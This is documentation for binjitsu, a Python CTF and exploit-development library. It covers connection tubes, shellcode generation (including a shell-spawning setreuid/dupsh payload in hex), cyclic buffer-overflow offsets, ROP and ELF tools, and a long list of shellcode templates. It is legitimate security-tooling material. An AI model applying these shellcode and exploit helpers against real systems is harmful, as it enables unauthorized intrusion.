binjitsu¶
binjitsu
is a CTF framework and exploit development library.
Written in Python, it is designed for rapid prototyping and development,
and intended to make exploit writing as simple as possible.
Getting Started¶
About binjitsu¶
Whether you’re using it to write exploits, or as part of another software project will dictate how you use it.
Historically binjitsu was used as a sort of exploit-writing DSL. Simply doing
from pwn import *
in a previous version of binjitsu would bring all sorts of
nice side-effects.
When redesigning binjitsu for 2.0, we noticed two contrary goals:
- We would like to have a “normal” python module structure, to allow other people to familiarize themselves with binjitsu quickly.
- We would like to have even more side-effects, especially by putting the terminal in raw-mode.
To make this possible, we decided to have two different modules. pwnlib
would be our nice, clean Python module, while pwn
would be used during
CTFs.
pwn
— Toolbox optimized for CTFs¶
As stated, we would also like to have the ability to get a lot of these side-effects by default. That is the purpose of this module. It does the following:
- Imports everything from the toplevel
pwnlib
along with functions from a lot of submodules. This means that if you doimport pwn
orfrom pwn import *
, you will have access to everything you need to write an exploit. - Calls
pwnlib.term.init()
to put your terminal in raw mode and implements functionality to make it appear like it isn’t. - Setting the
pwnlib.context.log_level
to “info”. - Tries to parse some of the values in
sys.argv
and every value it succeeds in parsing it removes.
pwnlib
— Normal python library¶
This module is our “clean” python-code. As a rule, we do not think that
importing pwnlib
or any of the submodules should have any significant
side-effects (besides e.g. caching).
For the most part, you will also only get the bits you import. You for instance
not get access to pwnlib.util.packing
simply by doing import
pwnlib.util
.
Though there are a few exceptions (such as pwnlib.shellcraft
), that does
not quite fit the goals of being simple and clean, but they can still be
imported without implicit side-effects.
Installation¶
binjitsu is best supported on Ubuntu 12.04 and 14.04, but most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).
Prerequisites¶
In order to get the most out of binjitsu
, you should have the
following system libraries installed.
Binutils¶
Assembly of foreign architectures (e.g. assembling Sparc shellcode on
Mac OS X) requires cross-compiled versions of binutils
to be
installed. We’ve made this process as smooth as we can.
In these examples, replace $ARCH
with your target architecture (e.g., arm, mips64, vax, etc.).
Building binutils from source takes about 60 seconds on a modern 8-core machine.
Ubuntu¶
First, add our Personal Package Archive repository.
$ apt-get install software-properties-common
$ apt-add-repository ppa:pwntools/binutils
$ apt-get update
Then, install the binutils for your architecture.
$ apt-get install binutils-$ARCH-linux-gnu
Mac OS X¶
Mac OS X is just as easy, but requires building binutils from source.
However, we’ve made homebrew
recipes to make this a single command.
After installing brew, grab the appropriate
recipe from our binutils
repo.
$ brew install https://raw.githubusercontent.com/binjitsu/binjitsu-binutils/master/osx/binutils-$ARCH.rb
Alternate OSes¶
If you want to build everything by hand, or don’t use any of the above
OSes, binutils
is simple to build by hand.
#!/usr/bin/env bash
V=2.25 # Binutils Version
ARCH=arm # Target architecture
cd /tmp
wget -nc https://ftp.gnu.org/gnu/binutils/binutils-$V.tar.gz
wget -nc https://ftp.gnu.org/gnu/binutils/binutils-$V.tar.gz.sig
gpg --keyserver keys.gnupg.net --recv-keys 4AE55E93
gpg --verify binutils-$V.tar.gz.sig
tar xf binutils-$V.tar.gz
mkdir binutils-build
cd binutils-build
export AR=ar
export AS=as
../binutils-$V/configure \
--prefix=/usr/local \
--target=$ARCH-unknown-linux-gnu \
--disable-static \
--disable-multilib \
--disable-werror \
--disable-nls
MAKE=gmake
hash gmake || MAKE=make
$MAKE -j clean all
sudo $MAKE install
Released Version¶
binjitsu is available as a pip
package.
$ apt-get install python2.7 python2.7-dev python-pip
$ pip install --upgrade git+https://github.com/binjitsu/binjitsu.git
Development¶
If you are hacking on Binjitsu locally, you’ll want to do something like this:
$ git clone https://github.com/binjitsu/binjitsu
$ cd binjitsu
$ pip install -e .
Getting Started¶
To get your feet wet with binjitsu, let’s first go through a few examples.
When writing exploits, binjitsu generally follows the “kitchen sink” approach.
>>> from pwn import *
This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function.
A full list of everything that is imported is available on from pwn import *.
Making Connections¶
You need to talk to the challenge binary in order to pwn it, right?
binjitsu makes this stupid simple with its pwnlib.tubes
module.
This exposes a standard interface to talk to processes, sockets, serial ports,
and all manner of things, along with some nifty helpers for common tasks.
For example, remote connections via pwnlib.tubes.remote
.
>>> conn = remote('ftp.debian.org',21)
>>> conn.recvline()
'220 ...'
>>> conn.send('USER anonymous\r\n')
>>> conn.recvuntil(' ', drop=True)
'331'
>>> conn.recvline()
'Please specify the password.\r\n'
>>> conn.close()
It’s also easy to spin up a listener
>>> l = listen()
>>> r = remote('localhost', l.lport)
>>> c = l.wait_for_connection()
>>> r.send('hello')
>>> c.recv()
'hello'
Interacting with processes is easy thanks to pwnlib.tubes.process
.
>>> sh = process('/bin/sh')
>>> sh.sendline('sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
''
>>> sh.recvline(timeout=5)
'hello world\n'
>>> sh.close()
Not only can you interact with processes programmatically, but you can actually interact with processes.
>>> sh.interactive()
$ whoami
user
There’s even an SSH module for when you’ve got to SSH into a box to perform
a local/setuid exploit with pwnlib.tubes.ssh
. You can quickly spawn
processes and grab the output, or spawn a process and interact iwth it like
a process
tube.
>>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0')
>>> shell['whoami']
'bandit0'
>>> shell.download_file('/etc/motd')
>>> sh = shell.run('sh')
>>> sh.sendline('sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
''
>>> sh.recvline(timeout=5)
'hello world\n'
>>> shell.close()
Packing Integers¶
A common task for exploit-writing is converting between integers as Python
sees them, and their representation as a sequence of bytes.
Usually folks resort to the built-in struct
module.
binjitsu makes this easier with pwnlib.util.packing
. No more remembering
unpacking codes, and littering your code with helper routines.
>>> import struct
>>> p32(0xdeadbeef) == struct.pack('I', 0xdeadbeef)
True
>>> leet = '37130000'.decode('hex')
>>> u32('abcd') == struct.unpack('I', 'abcd')[0]
True
The packing/unpacking operations are defined for many common bit-widths.
>>> u8('A') == 0x41
True
Setting the Target Architecture and OS¶
The target architecture can generally be specified as an argument to the routine that requires it.
>>> asm('nop')
'\x90'
>>> asm('nop', arch='arm')
'\x00\xf0 \xe3'
However, it can also be set once in the global context
. The operating system, word size, and endianness can also be set here.
>>> context.arch = 'i386'
>>> context.os = 'linux'
>>> context.endian = 'little'
>>> context.word_size = 32
Additionally, you can use a shorthand to set all of the values at once.
>>> asm('nop')
'\x90'
>>> context(arch='arm', os='linux', endian='big', word_size=32)
>>> asm('nop')
'\xe3 \xf0\x00'
Setting Logging Verbosity¶
You can control the verbosity of the standard binjitsu logging via context
.
For example, setting
>>> context.log_level = 'debug'
Will cause all of the data sent and received by a tube
to be printed to the screen.
Assembly and Disassembly¶
Never again will you need to run some already-assembled pile of shellcode
from the internet! The pwnlib.asm
module is full of awesome.
>>> asm('mov eax, 0').encode('hex')
'b800000000'
But if you do, it’s easy to suss out!
>>> print disasm('6a0258cd80ebf9'.decode('hex'))
0: 6a 02 push 0x2
2: 58 pop eax
3: cd 80 int 0x80
5: eb f9 jmp 0x0
However, you shouldn’t even need to write your own shellcode most of the
time! binjitsu comes with the pwnlib.shellcraft
module, which is
loaded with useful time-saving shellcodes.
Let’s say that we want to setreuid(getuid(), getuid()) followed by dup`ing file descriptor 4 to `stdin, stdout, and stderr, and then pop a shell!
>>> asm(shellcraft.setreuid() + shellcraft.dupsh(4)).encode('hex')
'6a3158cd8089c36a465889d9cd806a045b6a0359496a3f58cd8075f86a68682f2f2f73682f62696e6a0b5889e331c999cd80'
Misc Tools¶
Never write another hexdump, thanks to pwnlib.util.fiddling
.
Find offsets in your buffer that cause a crash, thanks to pwnlib.cyclic
.
>>> print cyclic(20)
aaaabaaacaaadaaaeaaa
>>> # Assume EIP = 0x62616166 ('faab' which is pack(0x62616166)) at crash time
>>> print cyclic_find('faab')
120
ELF Manipulation¶
Stop hard-coding things! Look them up at runtime with pwnlib.elf
.
>>> e = ELF('/bin/cat')
>>> print hex(e.address)
0x400000
>>> print hex(e.symbols['write'])
0x401680
>>> print hex(e.got['write'])
0x60b070
>>> print hex(e.plt['write'])
0x401680
You can even patch and save the files.
>>> e = ELF('/bin/cat')
>>> e.read(e.address+1, 3)
'ELF'
>>> e.asm(e.address, 'ret')
>>> e.save('/tmp/quiet-cat')
>>> disasm(file('/tmp/quiet-cat','rb').read(1))
' 0: c3 ret'
from pwn import *
¶
The most common way that you’ll see binjitsu used is
>>> from pwn import *
Which imports a bazillion things into the global namespace to make your life easier.
This is a quick list of most of the objects and routines imported, in rough order of importance and frequency of use.
context
pwnlib.context.context
- Responsible for most of the binjitsu convenience settings
- Set context.log_level = ‘debug’ when troubleshooting your exploit
- Scope-aware, so you can disable logging for a subsection of code via
pwnlib.context.ContextType.local
remote
,listen
,ssh
,process
pwnlib.tubes
- Super convenient wrappers around all of the common functionality for CTF challenges
- Connect to anything, anywhere, and it works the way you want it to
- Helpers for common tasks like
recvline
,recvuntil
,clean
, etc. - Interact directly with the application via
.interactive()
p32
andu32
pwnlib.util.packing
- Useful functions to make sure you never have to remember if
'>'
means signed or unsigned forstruct.pack
, and no more ugly[0]
index at the end. - Set
signed
andendian
in sane manners (also these can be set once oncontext
and not bothered with again) - Most common sizes are pre-defined (
u8
,u64
, etc), andpwnlib.util.packing.pack()
lets you define your own.
log
pwnlib.log
- Make your output pretty!
cyclic
andcyclic_func
pwnlib.util.cyclic
- Utilities for generating strings such that you can find the offset of any given substring given only N (usually 4) bytes. This is super useful for straight buffer overflows. Instead of looking at 0x41414141, you could know that 0x61616171 means you control EIP at offset 64 in your buffer.
asm
anddisasm
pwnlib.asm
- Quickly turn assembly into some bytes, or vice-versa, without mucking about
- Supports any architecture for which you have a binutils installed
- Over 20 different architectures have pre-built binaries at ppa:binjitsu/binutils.
shellcraft
pwnlib.shellcraft
- Library of shellcode ready to go
asm(shellcraft.sh())
gives you a shell- Templating library for reusability of shellcode fragments
ELF
pwnlib.elf
- ELF binary manipulation tools, including symbol lookup, virtual memory to file offset helpers, and the ability to modify and save binaries back to disk
DynELF
pwnlib.dynelf
- Dynamically resolve functions given only a pointer to any loaded module, and a function which can leak data at any address
ROP
pwnlib.rop
- Automatically generate ROP chains using a DSL to describe what you want to do, rather than raw addresses
gdb.debug
andgdb.attach
pwnlib.gdb
- Launch a binary under GDB and pop up a new terminal to interact with it. Automates setting breakpoints and makes iteration on exploits MUCH faster.
- Alternately, attach to a running process given a PID,
pwnlib.tubes
object, or even just a socket that’s connected to it
args
Dictionary contining all-caps command-line arguments for quick access
Run via
python foo.py REMOTE=1
andargs['REMOTE'] == '1'
.- Can also control logging verbosity and terminal fancyness
- NOTERM
- SILENT
- DEBUG
randoms
,rol
,ror
,xor
,bits
pwnlib.util.fiddling
- Useful utilities for generating random data from a given alphabet, or simplifying math operations that usually require masking off with 0xffffffff or calling ord and chr an ugly number of times
net
pwnlib.util.net
- Routines for querying about network interfaces
proc
pwnlib.util.proc
- Routines for querying about processes
pause
- It’s the new
getch
- It’s the new
safeeval
pwnlib.util.safeeval
- Functions for safely evalutaing python code without nasty side-effects.
These are all pretty self explanatory, but are useful to have in the global namespace.
hexdump
read
andwrite
enhex
andunhex
more
group
align
andalign_down
urlencode
andurldecode
which
wget
Additionally, all of the following modules are auto-imported for you. You were going to do it anyway.
os
sys
time
requests
re
random
Command Line Tools¶
binjitsu comes with a handful of useful command-line utilities which serve as wrappers for some of the internal functionality.
asm¶
Assemble shellcode into bytes
usage: asm [-h] [-f {raw,hex,string,elf}] [-o file] [-c context] [-v AVOID] [-n] [-z] [-d] [-e ENCODER] [-i INFILE] [-r] [line [line ...]]
-
line
¶
Lines to assemble. If none are supplied, use stdin
-
-h
,
--help
¶
show this help message and exit
-
-f
{raw,hex,string,elf}
,
--format
{raw,hex,string,elf}
¶ Output format (defaults to hex for ttys, otherwise raw)
-
-o
<file>
,
--output
<file>
¶ Output file (defaults to stdout)
-
-c
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
,
--context
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
¶ The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: [‘16’, ‘32’, ‘64’, ‘android’, ‘cgc’, ‘freebsd’, ‘linux’, ‘windows’, ‘powerpc64’, ‘aarch64’, ‘sparc64’, ‘powerpc’, ‘mips64’, ‘msp430’, ‘thumb’, ‘amd64’, ‘sparc’, ‘alpha’, ‘s390’, ‘i386’, ‘m68k’, ‘mips’, ‘ia64’, ‘cris’, ‘vax’, ‘avr’, ‘arm’, ‘little’, ‘big’, ‘el’, ‘le’, ‘be’, ‘eb’]
-
-v
<avoid>
,
--avoid
<avoid>
¶ Encode the shellcode to avoid the listed bytes (provided as hex; default: 000a)
-
-n
,
--newline
¶
Encode the shellcode to avoid newlines
-
-z
,
--zero
¶
Encode the shellcode to avoid NULL bytes
-
-d
,
--debug
¶
Debug the shellcode with GDB
-
-e
<encoder>
,
--encoder
<encoder>
¶ Specific encoder to use
-
-i
<infile>
,
--infile
<infile>
¶ Specify input file
-
-r
,
--run
¶
Run output
checksec¶
Check binary security settings
usage: checksec [-h] [–file [elf [elf ...]]] [elf [elf ...]]
-
elf
¶
Files to check
-
-h
,
--help
¶
show this help message and exit
-
--file
<elf>
¶ File to check (for compatibility with checksec.sh)
constgrep¶
Looking up constants from header files. Example: constgrep -c freebsd -m ^PROT_ ‘3 + 4’
usage: constgrep [-h] [-e constant] [-i] [-m] [-c arch_or_os] [regex] [constant]
-
regex
¶
The regex matching constant you want to find
-
constant
¶
The constant to find
-
-h
,
--help
¶
show this help message and exit
-
-e
<constant>
,
--exact
<constant>
¶ Do an exact match for a constant instead of searching for a regex
-
-i
,
--case-insensitive
¶
Search case insensitive
-
-m
,
--mask-mode
¶
Instead of searching for a specific constant value, search for values not containing strictly less bits that the given value.
-
-c
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
,
--context
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
¶ The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: [‘16’, ‘32’, ‘64’, ‘android’, ‘cgc’, ‘freebsd’, ‘linux’, ‘windows’, ‘powerpc64’, ‘aarch64’, ‘sparc64’, ‘powerpc’, ‘mips64’, ‘msp430’, ‘thumb’, ‘amd64’, ‘sparc’, ‘alpha’, ‘s390’, ‘i386’, ‘m68k’, ‘mips’, ‘ia64’, ‘cris’, ‘vax’, ‘avr’, ‘arm’, ‘little’, ‘big’, ‘el’, ‘le’, ‘be’, ‘eb’]
cyclic¶
Cyclic pattern creator/finder
usage: cyclic [-h] [-a alphabet] [-n length] [-c context] [-l lookup_value] [count]
-
count
¶
Number of characters to print
-
-h
,
--help
¶
show this help message and exit
-
-a
<alphabet>
,
--alphabet
<alphabet>
¶ The alphabet to use in the cyclic pattern (defaults to all lower case letters)
-
-n
<length>
,
--length
<length>
¶ Size of the unique subsequences (defaults to 4).
-
-c
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
,
--context
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
¶ The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: [‘16’, ‘32’, ‘64’, ‘android’, ‘cgc’, ‘freebsd’, ‘linux’, ‘windows’, ‘powerpc64’, ‘aarch64’, ‘sparc64’, ‘powerpc’, ‘mips64’, ‘msp430’, ‘thumb’, ‘amd64’, ‘sparc’, ‘alpha’, ‘s390’, ‘i386’, ‘m68k’, ‘mips’, ‘ia64’, ‘cris’, ‘vax’, ‘avr’, ‘arm’, ‘little’, ‘big’, ‘el’, ‘le’, ‘be’, ‘eb’]
-
-l
<lookup_value>
,
-o
<lookup_value>
,
--offset
<lookup_value>
,
--lookup
<lookup_value>
¶ Do a lookup instead printing the alphabet
disasm¶
Disassemble bytes into text format
usage: disasm [-h] [-c arch_or_os] [-a address] [–color] [–no-color] [hex [hex ...]]
-
hex
¶
Hex-string to disasemble. If none are supplied, then it uses stdin in non-hex mode.
-
-h
,
--help
¶
show this help message and exit
-
-c
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
,
--context
{16,32,64,android,cgc,freebsd,linux,windows,powerpc64,aarch64,sparc64,powerpc,mips64,msp430,thumb,amd64,sparc,alpha,s390,i386,m68k,mips,ia64,cris,vax,avr,arm,little,big,el,le,be,eb}
¶ The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: [‘16’, ‘32’, ‘64’, ‘android’, ‘cgc’, ‘freebsd’, ‘linux’, ‘windows’, ‘powerpc64’, ‘aarch64’, ‘sparc64’, ‘powerpc’, ‘mips64’, ‘msp430’, ‘thumb’, ‘amd64’, ‘sparc’, ‘alpha’, ‘s390’, ‘i386’, ‘m68k’, ‘mips’, ‘ia64’, ‘cris’, ‘vax’, ‘avr’, ‘arm’, ‘little’, ‘big’, ‘el’, ‘le’, ‘be’, ‘eb’]
-
-a
<address>
,
--address
<address>
¶ Base address
-
--color
¶
Color output
-
--no-color
¶
Disable color output
elfpatch¶
usage: elfpatch [-h] elf offset bytes
-
elf
¶
File to patch
-
offset
¶
Offset to patch in virtual address (hex encoded)
-
bytes
¶
Bytes to patch (hex encoded)
-
-h
,
--help
¶
show this help message and exit
hex¶
Hex-encodes data provided on the command line or via stdin.
usage: hex [-h] [data [data ...]]
-
data
¶
Data to convert into hex
-
-h
,
--help
¶
show this help message and exit
phd¶
Pwnlib HexDump
usage: phd [-h] [-w WIDTH] [-l [HIGHLIGHT [HIGHLIGHT ...]]] [-s SKIP] [-c COUNT] [-o OFFSET] [–color [{always,never,auto}]] [file]
-
file
¶
File to hexdump. Reads from stdin if missing.
-
-h
,
--help
¶
show this help message and exit
-
-w
<width>
,
--width
<width>
¶ Number of bytes per line.
-
-l
<highlight>
,
--highlight
<highlight>
¶ Byte to highlight.
-
-s
<skip>
,
--skip
<skip>
¶ Skip this many initial bytes.
-
-c
<count>
,
--count
<count>
¶ Only show this many bytes.
-
-o
<offset>
,
--offset
<offset>
¶ Addresses in left hand column starts at this address.
-
--color
{always,never,auto}
¶ Colorize the output. When ‘auto’ output is colorized exactly when stdout is a TTY. Default is ‘auto’.
shellcraft¶
Microwave shellcode – Easy, fast and delicious
usage: shellcraft [-h] [-?] [-o file] [-f format] [-d] [-b] [-a] [-v AVOID] [-n] [-z] [-r] [–color] [–no-color] [–syscalls] [–address ADDRESS] [shellcode] [arg [arg ...]]
-
shellcode
¶
The shellcode you want
-
arg
¶
Argument to the chosen shellcode
-
-h
,
--help
¶
show this help message and exit
-
-
?
,
--show
¶
Show shellcode documentation
-
-o
<file>
,
--out
<file>
¶ Output file (default: stdout)
-
-f
{r,raw,s,str,string,c,h,hex,a,asm,assembly,p,i,hexii,e,elf,default}
,
--format
{r,raw,s,str,string,c,h,hex,a,asm,assembly,p,i,hexii,e,elf,default}
¶ Output format (default: hex), choose from {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocssed code
-
-d
,
--debug
¶
Debug the shellcode with GDB
-
-b
,
--before
¶
Insert a debug trap before the code
-
-a
,
--after
¶
Insert a debug trap after the code
-
-v
<avoid>
,
--avoid
<avoid>
¶ Encode the shellcode to avoid the listed bytes
-
-n
,
--newline
¶
Encode the shellcode to avoid newlines
-
-z
,
--zero
¶
Encode the shellcode to avoid NULL bytes
-
-r
,
--run
¶
Run output
-
--color
¶
Color output
-
--no-color
¶
Disable color output
-
--syscalls
¶
List syscalls
-
--address
<address>
¶ Load address
Available shellcodes are: aarch64.android.accept aarch64.android.access aarch64.android.acct aarch64.android.alarm aarch64.android.bind aarch64.android.brk aarch64.android.cat aarch64.android.chdir aarch64.android.chmod aarch64.android.chown aarch64.android.chroot aarch64.android.clock_getres aarch64.android.clock_gettime aarch64.android.clock_nanosleep aarch64.android.clock_settime aarch64.android.clone aarch64.android.close aarch64.android.connect aarch64.android.creat aarch64.android.dup aarch64.android.dup2 aarch64.android.dup3 aarch64.android.echo aarch64.android.epoll_create aarch64.android.epoll_create1 aarch64.android.epoll_ctl aarch64.android.epoll_pwait aarch64.android.epoll_wait aarch64.android.execve aarch64.android.exit aarch64.android.faccessat aarch64.android.fallocate aarch64.android.fchdir aarch64.android.fchmod aarch64.android.fchmodat aarch64.android.fchown aarch64.android.fchownat aarch64.android.fcntl aarch64.android.fdatasync aarch64.android.flock aarch64.android.fork aarch64.android.forkexit aarch64.android.fstat aarch64.android.fstat64 aarch64.android.fstatat64 aarch64.android.fsync aarch64.android.ftruncate aarch64.android.ftruncate64 aarch64.android.futimesat aarch64.android.getcwd aarch64.android.getegid aarch64.android.geteuid aarch64.android.getgid aarch64.android.getgroups aarch64.android.getitimer aarch64.android.getpeername aarch64.android.getpgid aarch64.android.getpgrp aarch64.android.getpid aarch64.android.getpmsg aarch64.android.getppid aarch64.android.getpriority aarch64.android.getresgid aarch64.android.getresuid aarch64.android.getrlimit aarch64.android.getrusage aarch64.android.getsid aarch64.android.getsockname aarch64.android.getsockopt aarch64.android.gettimeofday aarch64.android.getuid aarch64.android.gtty aarch64.android.ioctl aarch64.android.ioperm aarch64.android.iopl aarch64.android.kill aarch64.android.lchown aarch64.android.link aarch64.android.linkat aarch64.android.listen aarch64.android.loader aarch64.android.loader_append aarch64.android.lseek aarch64.android.lstat aarch64.android.lstat64 aarch64.android.madvise aarch64.android.mincore aarch64.android.mkdir aarch64.android.mkdirat aarch64.android.mknod aarch64.android.mknodat aarch64.android.mlock aarch64.android.mlockall aarch64.android.mmap aarch64.android.mprotect aarch64.android.mq_notify aarch64.android.mq_open aarch64.android.mq_timedreceive aarch64.android.mq_timedsend aarch64.android.mq_unlink aarch64.android.mremap aarch64.android.msync aarch64.android.munlock aarch64.android.munlockall aarch64.android.munmap aarch64.android.nanosleep aarch64.android.nice aarch64.android.open aarch64.android.openat aarch64.android.pause aarch64.android.pipe aarch64.android.pipe2 aarch64.android.poll aarch64.android.ppoll aarch64.android.prctl aarch64.android.pread aarch64.android.preadv aarch64.android.prlimit64 aarch64.android.profil aarch64.android.ptrace aarch64.android.putpmsg aarch64.android.pwrite aarch64.android.pwritev aarch64.android.read aarch64.android.readahead aarch64.android.readdir aarch64.android.readlink aarch64.android.readlinkat aarch64.android.readn aarch64.android.readv aarch64.android.recv aarch64.android.recvfrom aarch64.android.recvmmsg aarch64.android.recvmsg aarch64.android.remap_file_pages aarch64.android.rename aarch64.android.renameat aarch64.android.rmdir aarch64.android.sched_get_priority_max aarch64.android.sched_get_priority_min aarch64.android.sched_getaffinity aarch64.android.sched_getparam aarch64.android.sched_getscheduler aarch64.android.sched_rr_get_interval aarch64.android.sched_setaffinity aarch64.android.sched_setparam aarch64.android.sched_setscheduler aarch64.android.sched_yield aarch64.android.select aarch64.android.sendfile aarch64.android.sendfile64 aarch64.android.setdomainname aarch64.android.setgid aarch64.android.setgroups aarch64.android.sethostname aarch64.android.setitimer aarch64.android.setpgid aarch64.android.setpriority aarch64.android.setregid aarch64.android.setresgid aarch64.android.setresuid aarch64.android.setreuid aarch64.android.setrlimit aarch64.android.setsid aarch64.android.setsockopt aarch64.android.setsockopt_timeout aarch64.android.settimeofday aarch64.android.setuid aarch64.android.sh aarch64.android.sigaction aarch64.android.sigaltstack aarch64.android.signal aarch64.android.sigpending aarch64.android.sigprocmask aarch64.android.sigreturn aarch64.android.sigsuspend aarch64.android.socket aarch64.android.splice aarch64.android.stage aarch64.android.stat aarch64.android.stat64 aarch64.android.stime aarch64.android.stty aarch64.android.symlink aarch64.android.symlinkat aarch64.android.sync aarch64.android.sync_file_range aarch64.android.syscall aarch64.android.syslog aarch64.android.tee aarch64.android.time aarch64.android.timer_create aarch64.android.timer_delete aarch64.android.timer_getoverrun aarch64.android.timer_gettime aarch64.android.timer_settime aarch64.android.truncate aarch64.android.truncate64 aarch64.android.ulimit aarch64.android.umask aarch64.android.uname aarch64.android.unlink aarch64.android.unlinkat aarch64.android.unshare aarch64.android.ustat aarch64.android.utime aarch64.android.utimensat aarch64.android.utimes aarch64.android.vfork aarch64.android.vhangup aarch64.android.vmsplice aarch64.android.wait4 aarch64.android.waitid aarch64.android.waitpid aarch64.android.write aarch64.android.writev aarch64.infloop aarch64.linux.accept aarch64.linux.access aarch64.linux.acct aarch64.linux.alarm aarch64.linux.bind aarch64.linux.brk aarch64.linux.cat aarch64.linux.chdir aarch64.linux.chmod aarch64.linux.chown aarch64.linux.chroot aarch64.linux.clock_getres aarch64.linux.clock_gettime aarch64.linux.clock_nanosleep aarch64.linux.clock_settime aarch64.linux.clone aarch64.linux.close aarch64.linux.connect aarch64.linux.creat aarch64.linux.dup aarch64.linux.dup2 aarch64.linux.dup3 aarch64.linux.echo aarch64.linux.epoll_create aarch64.linux.epoll_create1 aarch64.linux.epoll_ctl aarch64.linux.epoll_pwait aarch64.linux.epoll_wait aarch64.linux.execve aarch64.linux.exit aarch64.linux.faccessat aarch64.linux.fallocate aarch64.linux.fchdir aarch64.linux.fchmod aarch64.linux.fchmodat aarch64.linux.fchown aarch64.linux.fchownat aarch64.linux.fcntl aarch64.linux.fdatasync aarch64.linux.flock aarch64.linux.fork aarch64.linux.forkexit aarch64.linux.fstat aarch64.linux.fstat64 aarch64.linux.fstatat64 aarch64.linux.fsync aarch64.linux.ftruncate aarch64.linux.ftruncate64 aarch64.linux.futimesat aarch64.linux.getcwd aarch64.linux.getegid aarch64.linux.geteuid aarch64.linux.getgid aarch64.linux.getgroups aarch64.linux.getitimer aarch64.linux.getpeername aarch64.linux.getpgid aarch64.linux.getpgrp aarch64.linux.getpid aarch64.linux.getpmsg aarch64.linux.getppid aarch64.linux.getpriority aarch64.linux.getresgid aarch64.linux.getresuid aarch64.linux.getrlimit aarch64.linux.getrusage aarch64.linux.getsid aarch64.linux.getsockname aarch64.linux.getsockopt aarch64.linux.gettimeofday aarch64.linux.getuid aarch64.linux.gtty aarch64.linux.ioctl aarch64.linux.ioperm aarch64.linux.iopl aarch64.linux.kill aarch64.linux.lchown aarch64.linux.link aarch64.linux.linkat aarch64.linux.listen aarch64.linux.loader aarch64.linux.loader_append aarch64.linux.lseek aarch64.linux.lstat aarch64.linux.lstat64 aarch64.linux.madvise aarch64.linux.mincore aarch64.linux.mkdir aarch64.linux.mkdirat aarch64.linux.mknod aarch64.linux.mknodat aarch64.linux.mlock aarch64.linux.mlockall aarch64.linux.mmap aarch64.linux.mprotect aarch64.linux.mq_notify aarch64.linux.mq_open aarch64.linux.mq_timedreceive aarch64.linux.mq_timedsend aarch64.linux.mq_unlink aarch64.linux.mremap aarch64.linux.msync aarch64.linux.munlock aarch64.linux.munlockall aarch64.linux.munmap aarch64.linux.nanosleep aarch64.linux.nice aarch64.linux.open aarch64.linux.openat aarch64.linux.pause aarch64.linux.pipe aarch64.linux.pipe2 aarch64.linux.poll aarch64.linux.ppoll aarch64.linux.prctl aarch64.linux.pread aarch64.linux.preadv aarch64.linux.prlimit64 aarch64.linux.profil aarch64.linux.ptrace aarch64.linux.putpmsg aarch64.linux.pwrite aarch64.linux.pwritev aarch64.linux.read aarch64.linux.readahead aarch64.linux.readdir aarch64.linux.readlink aarch64.linux.readlinkat aarch64.linux.readn aarch64.linux.readv aarch64.linux.recv aarch64.linux.recvfrom aarch64.linux.recvmmsg aarch64.linux.recvmsg aarch64.linux.remap_file_pages aarch64.linux.rename aarch64.linux.renameat aarch64.linux.rmdir aarch64.linux.sched_get_priority_max aarch64.linux.sched_get_priority_min aarch64.linux.sched_getaffinity aarch64.linux.sched_getparam aarch64.linux.sched_getscheduler aarch64.linux.sched_rr_get_interval aarch64.linux.sched_setaffinity aarch64.linux.sched_setparam aarch64.linux.sched_setscheduler aarch64.linux.sched_yield aarch64.linux.select aarch64.linux.sendfile aarch64.linux.sendfile64 aarch64.linux.setdomainname aarch64.linux.setgid aarch64.linux.setgroups aarch64.linux.sethostname aarch64.linux.setitimer aarch64.linux.setpgid aarch64.linux.setpriority aarch64.linux.setregid aarch64.linux.setresgid aarch64.linux.setresuid aarch64.linux.setreuid aarch64.linux.setrlimit aarch64.linux.setsid aarch64.linux.setsockopt aarch64.linux.setsockopt_timeout aarch64.linux.settimeofday aarch64.linux.setuid aarch64.linux.sh aarch64.linux.sigaction aarch64.linux.sigaltstack aarch64.linux.signal aarch64.linux.sigpending aarch64.linux.sigprocmask aarch64.linux.sigreturn aarch64.linux.sigsuspend aarch64.linux.socket aarch64.linux.splice aarch64.linux.stage aarch64.linux.stat aarch64.linux.stat64 aarch64.linux.stime aarch64.linux.stty aarch64.linux.symlink aarch64.linux.symlinkat aarch64.linux.sync aarch64.linux.sync_file_range aarch64.linux.syscall aarch64.linux.syslog aarch64.linux.tee aarch64.linux.time aarch64.linux.timer_create aarch64.linux.timer_delete aarch64.linux.timer_getoverrun 